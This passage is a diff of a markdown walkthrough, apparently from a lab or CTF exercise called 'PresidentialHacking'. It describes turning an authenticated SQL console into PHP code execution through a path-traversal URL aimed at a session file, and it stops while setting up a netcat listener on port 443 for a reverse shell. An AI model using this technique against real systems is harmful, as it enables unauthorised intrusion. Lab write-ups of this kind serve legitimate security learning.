simonecossaro/PresidentialHacking/home.md

 After authentication it is possible to execute sql queries on the databases present.

-The normal functioning of the web application does not allow the interpretation and execution of code inserted in the backticks.
-However, by carefully structuring the URL and inserting a php script between backticks into a SQL query, it is possible to obtain the execution of the script.
+Under normal circumstances, the web application does not interpret or execute code placed within backticks.
+However, by meticulously crafting the URL and embedding a PHP script within backticks in a SQL query, it becomes possible to execute the script.

-The URL must have the following format: http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/ php/session/sess_{cookieValue}
+The URL must have the following format:
+'http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/ php/session/sess_{cookieValue}'
 where {cookieValue} is the current session's cookie value.

 By listening with a netcat listener on port 443 and injecting a SQL query like: